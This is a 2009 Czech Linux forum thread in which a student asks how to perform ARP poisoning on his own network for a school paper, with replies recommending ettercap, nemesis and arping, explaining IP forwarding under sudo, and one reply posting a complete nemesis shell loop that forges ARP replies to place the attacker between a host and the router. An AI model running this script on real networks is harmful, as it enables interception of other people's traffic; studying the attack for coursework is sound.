abclinuxu.cz AbcLinuxu.cz itbiz.cz ITBiz.cz HDmag.cz HDmag.cz abcprace.cz AbcPráce.cz
AbcLinuxu hledá autory!
Inzerujte na AbcPráce.cz od 950 Kč
Rozšířené hledání
×

    včera 20:44 | Nová verze

    LibrePCB, tj. svobodný multiplatformní softwarový nástroj pro návrh desek plošných spojů (PCB), dospěl po pěti letech vývoje do verze 1.0.0. Přehled novinek v příspěvku na blogu a v aktualizované dokumentaci. Zdrojové kódy jsou k dispozici na GitHubu pod licencí GPLv3.

    Ladislav Hagara | Komentářů: 0
    23.9. 16:55 | IT novinky

    Facebook má nové logo. Poznáte rozdíl?

    Ladislav Hagara | Komentářů: 6
    23.9. 15:55 | Nová verze

    Byla vydána nová verze 7.2 v Javě napsané aplikace pro komplexní návrh rozmístění nábytku a dalšího vybavení v interiérech Sweet Home 3D. Vyzkoušet lze online verzi. Před dvěma týdny vyšla placená verze pro chytré telefony a tablety (App Store, Google Play).

    Ladislav Hagara | Komentářů: 4
    22.9. 14:11 | Pozvánky

    Zítra 23. září proběhne Maker Faire Mladá Boleslav, festival plný workshopů, interaktivních činností a především nadšených a zvídavých lidí.

    Ladislav Hagara | Komentářů: 0
    22.9. 13:33 | Nová verze

    Byla vydána beta verze Ubuntu 23.10 s kódovým názvem Mantic Minotaur. Přehled novinek v poznámkách k vydání. Dle plánu by Ubuntu 23.10 mělo vyjít 12. října 2023.

    Ladislav Hagara | Komentářů: 10
    22.9. 11:22 | Zajímavý článek

    Josef Průša informuje o nových verzích firmwarů pro tiskárny Original Prusa, 5.0.0 pro MK4 a MK3.9 a 5.1.0-alpha1 pro MINI, díky kterým jsou tiskárny mnohem rychlejší.

    Ladislav Hagara | Komentářů: 0
    22.9. 09:11 | Nová verze

    Mastodon (Wikipedie), svobodná federalizovaná sociální síť, byl vydán ve verzi 4.2. Z novinek je vypíchnuto vylepšené vyhledávání.

    Ladislav Hagara | Komentářů: 8
    22.9. 08:55 | Zajímavý článek

    Ben Hawkes publikoval pod názvem The WebP 0day analýzu bezpečnostní chyby CVE-2023-4863 v knihovně WebP / libwebp s řadou zajímavých odkazů. Pravděpodobně se jedná o stejnou chybu jako BLASTPASS (CVE-2023-41064 a CVE-2023-41061) v macOS, iOS, iPadOS a watchOS. Zpracování (zobrazení) speciálně připraveného obrázku nebo přílohy vedlo ke spuštění útočníkem připraveného kódu.

    Ladislav Hagara | Komentářů: 0
    22.9. 08:11 | Zajímavý článek

    Myš je pro kočku: Prohlížeče je dalším dílem ze série článků Myš je pro kočku, kde Edvard Rejthar ukazuje, jak lze počítač ovládat bez myši. Používáte ve webových prohlížečích zkratky Ctrl+(Shift)+Tab, Ctrl+(Shift)+PgDn/PgUp, F6, (Shift)+Alt+Enter nebo F7?

    Ladislav Hagara | Komentářů: 10
    21.9. 14:33 | Nová verze

    Vývojáři mobilní Datovky prosí o pomoc s testováním beta verze mobilní Datovky s novým grafickým rozhraním, podporou pro tmavý režim a podporou pro VoDZ. Aplikace je zatím dostupná pouze pro zařízení Android a je umístěna v samostatném instalačním kanále Datovka Beta. Tento kanál slouží pro testovaní nové funkcionality a grafického uživatelského rozhraní. Datovka Beta se instaluje jako samostatná aplikace s vlastními daty, která

    … více »
    Ladislav Hagara | Komentářů: 0
    Knihy s linuxovou tematikou
     (19%)
     (15%)
     (50%)
     (27%)
    Celkem 274 hlasů
     Komentářů: 11, poslední 17.9. 19:19
    Rozcestník
    Štítky: není přiřazen žádný štítek

    Dotaz: Arp poisoning

    29.10.2009 14:57 Marek Adamovsky
    Arp poisoning
    Přečteno: 748×
    Dobry den, rad bych na sve siti provedl ARP poisoning, abych mohl tento utok analyzovat a popsat jako praci do skoly. Muzete mi prosim poradit jakou aplikaci na ARP poisoning pouzit?

    Odpovědi

    Cubic avatar 29.10.2009 15:21 Cubic | skóre: 24 | blog: obcasne_vyplody | Essex
    Rozbalit Rozbalit vše Re: Arp poisoning
    google nic? zacit muzes s ettercap
    29.10.2009 16:49 Marek Adamovsky
    Rozbalit Rozbalit vše Re: Arp poisoning
    Dekuji, prave to zkousim. Podle tohoto navodu: http://openmaniak.com/ettercap_arp.php Data zachytavam Wiresharkem, jenze mi to funguje tak na pul. "Otraveny" host posle pozadavek (treba na nacteni stranky) na router, ja ho ale u sebe nevidim. Vidim pouze odpoved, ktera prijde.

    Je to jako kdyby host nebyl otraveny a posilal data spravne na router a router byl otraveny a posilal data ke mne. Je neco takoveho mozne? V cem muze byt chyba?

    A jeste bych se chtel zeptat, jestli je toto ok:
    $ cat /proc/sys/net/ipv4/ip_forward
    0
    
    Cubic avatar 29.10.2009 17:22 Cubic | skóre: 24 | blog: obcasne_vyplody | Essex
    Rozbalit Rozbalit vše Re: Arp poisoning

    nevim, jen jsem si vzpomnel ze to je v ettercapu mozne ale predpokladam ze

    echo 1 > /proc/sys/net/ipv4/ip_forward
    potreba bude
    29.10.2009 17:33 Marek Adamovsky
    Rozbalit Rozbalit vše Re: Arp poisoning
    A nevite proc nejde toto:
    $ sudo echo 1 > /proc/sys/net/ipv4/ip_forward
    bash: /proc/sys/net/ipv4/ip_forward: Permission denied
    
    Pokud se ale prepnu na roota pres su tak to jde, ale ja bych to rad umistil do skriptu.
    Bilbo avatar 29.10.2009 17:51 Bilbo | skóre: 29
    Rozbalit Rozbalit vše Re: Arp poisoning
    Protoze to provede prikaz "echo 1" pod rootem a jeho vystup (uz pod normalnim uzivatelem) presmeruje do /proc/sys/net/ipv4/ip_forward

    Musi se to ouvozovkovat:

    sudo 'echo 1 > /proc/sys/net/ipv4/ip_forward'

    pak se to spusti spravne cele jako prikaz pod rootem
    Big brother is not watching you anymore. Big Brother is telling you how to live...
    8.11.2009 09:32 Marek Adamovsky
    Rozbalit Rozbalit vše Re: Arp poisoning
    Stale nic:
    $ sudo 'echo 1 > /proc/sys/net/ipv4/ip_forward'
    sudo: echo 1 > /proc/sys/net/ipv4/ip_forward: command not found
    
    8.11.2009 11:30 l4m4
    Rozbalit Rozbalit vše Re: Arp poisoning
    sudo takhle nefunguje (tj. nenechává napsané interpretovat shellem), protože by to citelně zkomplikovalo omezení, když má uživatel povoleno spouštět jen určité věci. sudo prostě napsané exec-ne.

    a) spouštěj to v rootovském shellu

    b) dej to do skriptu, ten pak můžeš spouštět přes sudo
    Bilbo avatar 8.11.2009 15:20 Bilbo | skóre: 29
    Rozbalit Rozbalit vše Re: Arp poisoning
    No, pokud je sudo "neomezene" (osobne sudo nepouzivam, jen su, takze ho moc neznam, ale tusim nejak takhle je nastaveno treba ve vychozi konfiguraci Ubuntu), tak i s tim shellem by to slo, asi by se muselo pouzit neco jako:

    sudo sh -c 'echo 1 > /proc/sys/net/ipv4/ip_forward'

    nebo

    sudo "sh -c 'echo 1 > /proc/sys/net/ipv4/ip_forward'"

    Nebo ten skript :)
    Big brother is not watching you anymore. Big Brother is telling you how to live...
    29.10.2009 16:17 NN
    Rozbalit Rozbalit vše Re: Arp poisoning
    nemesis (odzkouseno :D )

    NN
    29.10.2009 19:40 faha
    Rozbalit Rozbalit vše Re: Arp poisoning

    Zdravim, je to vcelku "trivialni" utok a take je pomerne dobre popsany, hezky je to popsane v knize Linux hackerské útoky.

    Jeden z pouzivanych nastroju je nemesis, najdete ho alespon v debianu primo v repositari.

    nemesis - TCP/IP Packet Injection Suite

    Jeste prikladam skriptik jak to udelat...

    ----

    #!/bin/sh

    SOURCEMAC=""
    SOURCEIP=""

    DESTMAC=""
    DESTIP=""

    MYMAC=""
    MYIP=""

    while true
    do
    # 1
    /usr/bin/nemesis arp -v -r -d eth0 -S $DESTIP -D $SOURCEIP -h $MYMAC -m $SOURCEMAC -H $MYMAC -M $SOURCEMAC

    # 2
    /usr/bin/nemesis arp -v -r -d eth0 -S $SOURCEIP -D $DESTIP -h $MYMAC -m $DESTMAC -H $MYMAC -M $DESTMAC
    echo "Injecting ... "
    sleep 10
    done
    ----

    Jendа avatar 29.10.2009 20:42 Jendа | skóre: 78 | blog: Jenda | JO70FB
    Rozbalit Rozbalit vše Re: Arp poisoning
    29.10.2009 21:29 pht | skóre: 48 | blog: pht
    Rozbalit Rozbalit vše Re: Arp poisoning
    Na to stačí arping. Jinak, zkuste si najít "hunt".
    In Ada the typical infinite loop would normally be terminated by detonation.

    Založit nové vláknoNahoru

    Tiskni Sdílej: Linkuj Jaggni to Vybrali.sme.sk Google Del.icio.us Facebook

    ISSN 1214-1267   www.czech-server.cz
    © 1999-2015 Nitemedia s. r. o. Všechna práva vyhrazena.